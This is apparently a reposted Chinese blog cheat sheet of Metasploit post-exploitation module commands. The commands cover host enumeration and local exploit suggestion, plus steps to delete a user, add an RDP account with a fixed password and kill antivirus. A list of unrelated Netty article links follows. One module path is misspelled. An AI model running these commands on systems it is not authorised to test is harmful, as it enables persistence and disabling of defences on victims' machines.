博客
关于我
Metasploit -- 后渗透模块(POST)
阅读量:311 次
发布时间:2019-03-03

本文共 649 字,大约阅读时间需要 2 分钟。

​给时间一点时间,让过去过去,让开始开始。。。

----  网易云热评

作用:获取目标主机后shell后,继续信息收集,提权

1、获取目标分区情况

run post/windows/gather/forensics/enum_drives

2、检测是否是虚拟主机

run post/windows/gather/checkvm

3、获取当前安装的应用程序

run post/windows/gather/enum_applications

4、获取用户登录信息

run post/windows/gather/enum_logged_on_users

5、对目标进行漏洞扫描

run post/multi/recon/local_exploit_suggester

6、收集系统环境信息

run post/multi/gather/env

7、查看开启的服务

run post/windows/gather/enum_services

8、查看目标主机最近的操作

run post/windows/gather/dumplinks

 

9、其他操作

删除用户

run post/wndows/manage/delete_user username=aiyou

添加账户

run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou

关闭杀软

windows/manage/killav

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

转载地址:http://ovnl.baihongyu.com/

你可能感兴趣的文章
Netty框架内的宝藏:ByteBuf
查看>>
Netty框架的服务端开发中创建EventLoopGroup对象时线程数量源码解析
查看>>
Netty源码—1.服务端启动流程一
查看>>
Netty源码—1.服务端启动流程二
查看>>
Netty源码—2.Reactor线程模型一
查看>>
Netty源码—2.Reactor线程模型二
查看>>
Netty源码—3.Reactor线程模型三
查看>>
Netty源码—3.Reactor线程模型四
查看>>
Netty源码—4.客户端接入流程一
查看>>
Netty源码—4.客户端接入流程二
查看>>
Netty源码—5.Pipeline和Handler一
查看>>
Netty源码—5.Pipeline和Handler二
查看>>
Netty源码—6.ByteBuf原理一
查看>>
Netty源码—6.ByteBuf原理二
查看>>
Netty源码—7.ByteBuf原理三
查看>>
Netty源码—7.ByteBuf原理四
查看>>
Netty源码—8.编解码原理一
查看>>
Netty源码—8.编解码原理二
查看>>
Netty源码解读
查看>>
netty的HelloWorld演示
查看>>